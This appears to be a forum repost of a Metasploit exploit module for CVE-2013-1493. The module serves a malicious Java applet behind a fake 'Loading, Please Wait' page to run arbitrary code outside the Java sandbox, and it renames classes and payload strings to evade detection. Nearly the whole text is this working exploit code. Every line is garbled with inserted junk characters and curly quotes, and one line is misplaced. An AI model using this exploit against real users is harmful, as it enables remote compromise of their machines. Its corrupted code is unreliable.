## p5 w# i+ v& o5 _( k
6 J. P; V( O# v: [# This file is part of the Metasploit Framework and may be subject to) S/ ^7 [' W* L% Z
# redistribution and commercial restrictions. Please see the Metasploit" r/ b/ L) N/ X/ x. y
# web site for more information on licensing and terms of use.4 D# U+ v* F7 v& H/ P+ m! [* c
# http://metasploit.com/
6 z, P: \/ T5 N9 J/ ~: G##/ ]' _1 P4 G5 q0 v
require ‘msf/core’. m9 m: B! j' `( t. [- N
require ‘rex’; L# d) A6 V5 ^0 T* y) i. C
class Metasploit3 < Msf::Exploit::Remote
, X1 }7 o# L9 N! U" C8 e5 {( yRank = NormalRanking& O/ q: a' X$ Z% R# D4 P
include Msf::Exploit::Remote::HttpServer::HTML% S- q2 q# {# o: l- O$ @
include Msf::Exploit::EXE
. c8 x% }& L& `$ j- }include Msf::Exploit::Remote::BrowserAutopwn
5 f1 m3 ]( `3 S5 ^! y* _4 Oautopwn_info({ :javascript => false })2 e9 L. D* p- f& Y$ k" b
def initialize( info = {} )
% t! n) V) t' l. @, R+ Y: hsuper( update_info( info,1 |6 f$ L2 H/ q$ e# t
‘Name’ => ‘Java CMM Remote Code Execution’,
3 w$ p; {- q3 e$ t‘Description’ => %q{
0 G) G5 T9 s2 D0 U" ~( F8 a1 EThis module abuses the Color Management classes from a Java Applet to run, p& s- ]( P' e$ p9 C
arbitrary Java code outside of the sandbox as exploited in the wild in February
/ m. E( h. n4 `$ dand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
* `3 F4 ~# c6 Q2 c( D1 tand earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
; U6 q3 F3 R* vsystems. This exploit doesn’t bypass click-to-play, so the user must accept the java {' b4 D. X) g7 r+ s
warning in order to run the malicious applet.
% u+ ?& y- r, Q},
1 N7 l6 I) D2 n8 d! j‘License’ => MSF_LICENSE,( |# I# B' B: `0 ^9 K) F" |6 K
‘Author’ =>: k) K1 {! e7 |6 E5 X; K, `+ X
'Unknown', # Vulnerability discovery and Exploit
4 D8 B# }$ d! ~* O. e'juan vazquez' # Metasploit module (just ported the published exploit). K1 O3 a: M% @' D7 [* x5 J% d
],
) S& K- ^9 h, o/ R6 O‘References’ =>
/ n3 K! Q4 h8 |' r: ][# P& H( R: e% H3 U! ~
[ 'CVE', '2013-1493' ],
, A$ D+ I' ]( ^[ 'OSVDB', '90737' ],# k* m! q4 o- A" J, H
[ 'BID', '58238' ],0 l+ L0 o) V3 t7 i3 G5 c n o
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],- h. [$ k: ?) D0 b. {
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],+ v& H. A1 H h3 [8 W' H6 p R0 d
[ 'URL', 'http://pastie.org/pastes/6581034' ]
- W/ x. a+ O* B* C) |2 ?! k3 l$ m9 a b],, o. N7 X4 G8 r
‘Platform’ => [ 'win', 'java' ],
$ _; z R1 a, F+ w( A# l& l‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },; u) Z. p3 d. [5 \% M4 Z6 Y8 R
‘Targets’ =>
9 D5 K& u# k8 g2 ^4 L7 r0 U[: b' D$ ?6 d5 {
[ 'Generic (Java Payload)',0 D8 E8 k2 v) C; l7 k( A+ J: [4 E
{
: R# T7 j5 j0 h' ^; M'Platform' => 'java',8 s* ?- E# {+ }% m9 P
'Arch' => ARCH_JAVA
: r) U. p. M% i; J( I/ b: Q" {& s}4 v3 n w2 i, R m
],' g0 a0 M% `3 x% Q' d3 b
[ 'Windows x86 (Native Payload)',
/ k6 t; f0 w/ J9 o{! x+ A- ?# |* `
'Platform' => 'win',
% M3 B3 t- C2 x: ^; \) N# X- U B'Arch' => ARCH_X860 I% s7 ~3 Q2 [0 W+ W @0 Y
}( `1 c5 y1 f9 a5 v4 Y: [# s
]
: T# _, |" z: `" r8 `& e],: b6 k& L' P* H7 Q
‘‘DisclosureDate’ => ‘Mar 01 2013′% P) B. C/ x/ h% O
)): \* R$ \* A! O+ ~ a7 X% E
end& x8 ~4 o" c0 {
def setup, I( ?) Y2 }2 r" K
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”): a( Z0 w' \+ W0 h8 [# S# Y; H$ Y
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }" k+ h/ U, X# x, F
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
E1 ~ @3 t6 w' S( |@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
0 x& J0 W) b4 J7 q$ h& Upath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
3 v# [: _6 n: E5 n Q% T@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
6 Z+ Q5 D* U$ |: t' dpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
, B2 \& Y \& c) _/ j$ g@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
' f. b @9 q4 q9 B; ~@init_class_name = rand_text_alpha(“Init”.length)
7 R' ]' k. G' A; i- T( l- J@init_class.gsub!(“Init”, @init_class_name)) y/ U. B2 f) R( c4 c" j; d& x( R
super
- q3 `, k1 ?* c: Yend2 V' o* Q0 x- ]- r" g
def on_request_uri(cli, request)( m$ }. t" A2 x
print_status(“handling request for #{request.uri}”)
/ k3 M" m6 k2 E) G1 {+ }- r$ y3 Bcase request.uri
0 s. G/ V* V9 C6 N' T7 ~when /\.jar$/i
+ D" @/ I( }1 E" C" h; P# Bjar = payload.encoded_jar3 ?+ F( [# M! I4 z1 S) v
jar.add_file(“#{@init_class_name}.class”, @init_class)9 n! M" J: T/ X& q
jar.add_file(“Leak.class”, @leak_class)
# O" i$ b- ] njar.add_file(“MyBufferedImage.class”, @buffered_image_class)6 P* c0 F x: _2 }8 x
jar.add_file(“MyColorSpace.class”, @color_space_class)8 w+ e3 ~4 b- c7 u- h
DefaultTarget’ => 1,) R( ?6 n1 L% z
metasploit_str = rand_text_alpha(“metasploit”.length)
& _2 _# T3 K( M0 U- X: X* X6 jpayload_str = rand_text_alpha(“payload”.length)# R% _( l6 g7 M% l$ G4 r
jar.entries.each { |entry|- ~* E9 p, M% e. i' h
entry.name.gsub!(“metasploit”, metasploit_str)
?( A& |, i* {entry.name.gsub!(“Payload”, payload_str)6 k# a& J% F0 P& Q1 {* W
entry.data = entry.data.gsub(“metasploit”, metasploit_str)8 g" S- P. }! ^$ x$ ]9 a Z
entry.data = entry.data.gsub(“Payload”, payload_str)
2 G+ Q4 v/ v+ I# g& k' L6 E4 M}1 g7 }9 ]/ X! U# z1 ]) V) X) n n
jar.build_manifest
: @$ i6 p6 S" T- D4 zsend_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })" h9 ]7 ?$ B! f5 k/ N5 _
when /\/$/
& F7 ~' o+ O) t9 J& y4 cpayload = regenerate_payload(cli)% E6 K! m% O9 W: {1 _- O3 z! g4 Q
if not payload
' q: S$ B0 s& U7 aprint_error(“Failed to generate the payload.”)
1 K: O. y. @0 [# |send_not_found(cli)
" _+ K7 C" k6 e& _return
; k/ N+ [! W7 I1 ^3 o% Nend( ~ g# I( y0 \7 g+ ~
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })' ^: `" Z- U; T. J" P
else! c; B: W+ |- l, N. H4 @
send_redirect(cli, get_resource() + ‘/’, ”)" q H- S; j c* N) Y
end; Q$ b5 t, I/ e! G& ^
end: ]+ d6 A( ?7 j* ^! d( j* j
def generate_html
; q) J+ l) r# A6 Shtml = %Q|<html><head><title>Loading, Please Wait…</title></head>|
W" Q' p* E! ghtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|
0 K1 T; r5 f3 _% p* K; uhtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|2 D" y+ ?0 }' t! Q1 g
html += %Q|</applet></body></html>|" H, ^7 _- l/ a# G' x4 f3 n
return html9 I3 m1 u/ e: O' I; q5 |, k" x
end8 |+ X/ z0 {7 e2 O
end
5 u" X$ }# }$ Z( ^1 h/ Zend
+ S7 g9 L' {! q# s0 c/ h |
发表于 2013-4-4 17:31:17
收藏
支持
反对